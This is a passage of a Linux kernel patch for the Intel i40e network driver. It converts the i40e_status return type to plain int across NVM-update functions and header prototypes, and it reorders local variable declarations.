+@@ -216,13 +216,13 @@ read_nvm_exit:
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+-				    u8 module_pointer, u32 offset,
+-				    u16 words, void *data,
+-				    bool last_command)
++static int i40e_read_nvm_aq(struct i40e_hw *hw,
++			    u8 module_pointer, u32 offset,
++			    u16 words, void *data,
++			    bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -264,10 +264,10 @@ static i40e_status i40e_read_nvm_aq(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM using the AdminQ
+  **/
+-static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+-					 u16 *data)
++static int i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
++				 u16 *data)
+ {
+-	i40e_status ret_code = I40E_ERR_TIMEOUT;
++	int ret_code = I40E_ERR_TIMEOUT;
+ 
+ 	ret_code = i40e_read_nvm_aq(hw, 0x0, offset, 1, data, true);
+ 	*data = le16_to_cpu(*(__le16 *)data);
+@@ -286,8 +286,8 @@ static i40e_status i40e_read_nvm_word_aq(struct i40e_hw *hw, u16 offset,
+  * Do not use this function except in cases where the nvm lock is already
+  * taken via i40e_acquire_nvm().
+  **/
+-static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+-					u16 offset, u16 *data)
++static int __i40e_read_nvm_word(struct i40e_hw *hw,
++				u16 offset, u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_word_aq(hw, offset, data);
+@@ -303,10 +303,10 @@ static i40e_status __i40e_read_nvm_word(struct i40e_hw *hw,
+  *
+  * Reads one 16 bit word from the Shadow RAM.
+  **/
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-			       u16 *data)
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
++		       u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_NVM_READ_REQUIRES_LOCK)
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -330,17 +330,17 @@ i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+  * @words_data_size: Words to read from NVM
+  * @data_ptr: Pointer to memory location where resulting buffer will be stored
+  **/
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr)
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr)
+ {
+-	i40e_status status;
+ 	u16 specific_ptr = 0;
+ 	u16 ptr_value = 0;
+ 	u32 offset = 0;
++	int status;
+ 
+ 	if (module_ptr != 0) {
+ 		status = i40e_read_nvm_word(hw, module_ptr, &ptr_value);
+@@ -406,10 +406,10 @@ enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+-					      u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
++				      u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u16 index, word;
+ 
+ 	/* Loop thru the selected region */
+@@ -437,13 +437,13 @@ static i40e_status i40e_read_nvm_buffer_srctl(struct i40e_hw *hw, u16 offset,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-static i40e_status i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
+-					   u16 *words, u16 *data)
++static int i40e_read_nvm_buffer_aq(struct i40e_hw *hw, u16 offset,
++				   u16 *words, u16 *data)
+ {
+-	i40e_status ret_code;
+-	u16 read_size;
+ 	bool last_cmd = false;
+ 	u16 words_read = 0;
++	u16 read_size;
++	int ret_code;
+ 	u16 i = 0;
+ 
+ 	do {
+@@ -493,9 +493,9 @@ read_nvm_buffer_aq_exit:
+  * Reads 16 bit words (data buffer) from the SR using the i40e_read_nvm_srrd()
+  * method.
+  **/
+-static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+-					  u16 offset, u16 *words,
+-					  u16 *data)
++static int __i40e_read_nvm_buffer(struct i40e_hw *hw,
++				  u16 offset, u16 *words,
++				  u16 *data)
+ {
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE)
+ 		return i40e_read_nvm_buffer_aq(hw, offset, words, data);
+@@ -514,10 +514,10 @@ static i40e_status __i40e_read_nvm_buffer(struct i40e_hw *hw,
+  * method. The buffer read is preceded by the NVM ownership take
+  * and followed by the release.
+  **/
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data)
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
++			 u16 *words, u16 *data)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_SRCTL_ACCESS_ENABLE) {
+ 		ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -544,12 +544,12 @@ i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+  *
+  * Writes a 16 bit words buffer to the Shadow RAM using the admin command.
+  **/
+-static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
+-				     u32 offset, u16 words, void *data,
+-				     bool last_command)
++static int i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
++			     u32 offset, u16 words, void *data,
++			     bool last_command)
+ {
+-	i40e_status ret_code = I40E_ERR_NVM;
+ 	struct i40e_asq_cmd_details cmd_details;
++	int ret_code = I40E_ERR_NVM;
+ 
+ 	memset(&cmd_details, 0, sizeof(cmd_details));
+ 	cmd_details.wb_desc = &hw->nvm_wb_desc;
+@@ -594,14 +594,14 @@ static i40e_status i40e_write_nvm_aq(struct i40e_hw *hw, u8 module_pointer,
+  * is customer specific and unknown. Therefore, this function skips all maximum
+  * possible size of VPD (1kB).
+  **/
+-static i40e_status i40e_calc_nvm_checksum(struct i40e_hw *hw,
+-						    u16 *checksum)
++static int i40e_calc_nvm_checksum(struct i40e_hw *hw,
++				  u16 *checksum)
+ {
+-	i40e_status ret_code;
+ 	struct i40e_virt_mem vmem;
+ 	u16 pcie_alt_module = 0;
+ 	u16 checksum_local = 0;
+ 	u16 vpd_module = 0;
++	int ret_code;
+ 	u16 *data;
+ 	u16 i = 0;
+ 
+@@ -675,11 +675,11 @@ i40e_calc_nvm_checksum_exit:
+  * on ARQ completion event reception by caller.
+  * This function will commit SR to NVM.
+  **/
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
++int i40e_update_nvm_checksum(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
+-	u16 checksum;
+ 	__le16 le_sum;
++	int ret_code;
++	u16 checksum;
+ 
+ 	ret_code = i40e_calc_nvm_checksum(hw, &checksum);
+ 	if (!ret_code) {
+@@ -699,12 +699,12 @@ i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw)
+  * Performs checksum calculation and validates the NVM SW checksum. If the
+  * caller does not need checksum, the value can be NULL.
+  **/
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum)
++int i40e_validate_nvm_checksum(struct i40e_hw *hw,
++			       u16 *checksum)
+ {
+-	i40e_status ret_code = 0;
+-	u16 checksum_sr = 0;
+ 	u16 checksum_local = 0;
++	u16 checksum_sr = 0;
++	int ret_code = 0;
+ 
+ 	/* We must acquire the NVM lock in order to correctly synchronize the
+ 	 * NVM accesses across multiple PFs. Without doing so it is possible
+@@ -733,36 +733,36 @@ i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+ 	return ret_code;
+ }
+ 
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *errno);
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *errno);
+ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+ 						struct i40e_nvm_access *cmd,
+ 						int *perrno);
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno);
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
+-				       u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno);
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno);
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno);
+ static inline u8 i40e_nvmupd_get_module(u32 val)
+ {
+ 	return (u8)(val & I40E_NVM_MOD_PNT_MASK);
+@@ -807,12 +807,12 @@ static const char * const i40e_nvm_update_state_str[] = {
+  *
+  * Dispatches command depending on what update state is current
+  **/
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *perrno)
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *perrno)
+ {
+-	i40e_status status;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status;
+ 
+ 	/* assume success */
+ 	*perrno = 0;
+@@ -923,12 +923,12 @@ i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+  * Process legitimate commands of the Init state and conditionally set next
+  * state. Reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1062,12 +1062,12 @@ static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1104,13 +1104,13 @@ static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands
+  **/
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
+ 	bool retry_attempt = false;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1187,8 +1187,8 @@ retry:
+ 	 */
+ 	if (status && (hw->aq.asq_last_status == I40E_AQ_RC_EBUSY) &&
+ 	    !retry_attempt) {
+-		i40e_status old_status = status;
+ 		u32 old_asq_status = hw->aq.asq_last_status;
++		int old_status = status;
+ 		u32 gtime;
+ 
+ 		gtime = rd32(hw, I40E_GLVFGEN_TIMER);
+@@ -1370,17 +1370,17 @@ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
+-				       u8 *bytes, int *perrno)
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	struct i40e_aq_desc *aq_desc;
+ 	u32 buff_size = 0;
+ 	u8 *buff = NULL;
+ 	u32 aq_desc_len;
+ 	u32 aq_data_len;
++	int status;
+ 
+ 	i40e_debug(hw, I40E_DEBUG_NVM, "NVMUPD: %s\n", __func__);
+ 	if (cmd->offset == 0xffff)
+@@ -1429,8 +1429,8 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+ 				       buff_size, &cmd_details);
+ 	if (status) {
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "i40e_nvmupd_exec_aq err %s aq_err %s\n",
+-			   i40e_stat_str(hw, status),
++			   "%s err %d aq_err %s\n",
++			   __func__, status,
+ 			   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		*perrno = i40e_aq_rc_to_posix(status, hw->aq.asq_last_status);
+ 		return status;
+@@ -1454,9 +1454,9 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1523,9 +1523,9 @@ static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1557,13 +1557,13 @@ static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	u8 module, transaction;
++	int status;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1596,13 +1596,13 @@ static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno)
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1636,14 +1636,14 @@ static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
+ 	u8 preservation_flags;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_osdep.h b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+index 2f6815b2f8df8..2bd4de03dafa2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_osdep.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+@@ -56,5 +56,4 @@ do {								\
+ 			(h)->bus.func, ##__VA_ARGS__);		\
+ } while (0)
+ 
+-typedef enum i40e_status_code i40e_status;
+ #endif /* _I40E_OSDEP_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_prototype.h b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+index ebdcde6f1aeb4..c9c3726eafbec 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_prototype.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+@@ -16,29 +16,29 @@
+  */
+ 
+ /* adminq functions */
+-i40e_status i40e_init_adminq(struct i40e_hw *hw);
++int i40e_init_adminq(struct i40e_hw *hw);
+ void i40e_shutdown_adminq(struct i40e_hw *hw);
+ void i40e_adminq_init_ring_data(struct i40e_hw *hw);
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *events_pending);
+-i40e_status
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *events_pending);
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw,
+ 			 struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */
+ 			 u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+ 			 enum i40e_admin_queue_err *aq_status);
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */ u16  buff_size,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context);
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -53,324 +53,307 @@ void i40e_debug_aq(struct i40e_hw *hw, enum i40e_debug_mask mask,
+ 
+ void i40e_idle_aq(struct i40e_hw *hw);
+ bool i40e_check_asq_alive(struct i40e_hw *hw);
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
++int i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
+ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err);
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err);
+ 
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
+ 
+ u32 i40e_led_get(struct i40e_hw *hw);
+ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink);
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode);
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode);
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
+ 
+ /* admin send queue commands */
+ 
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
+-				u32  reg_addr, u64 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				      struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_reset);
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
+-				u64 advt_reg,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
++				u32 reg_addr, u64 *reg_val,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++				 bool qualified_modules, bool report_init,
++				 struct i40e_aq_get_phy_abilities_resp *abilities,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures, bool atomic_reset);
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
++			       u64 advt_reg,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 vsi_id, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details,
+-		bool rx_only_promisc);
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				u16 seid, bool enable,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
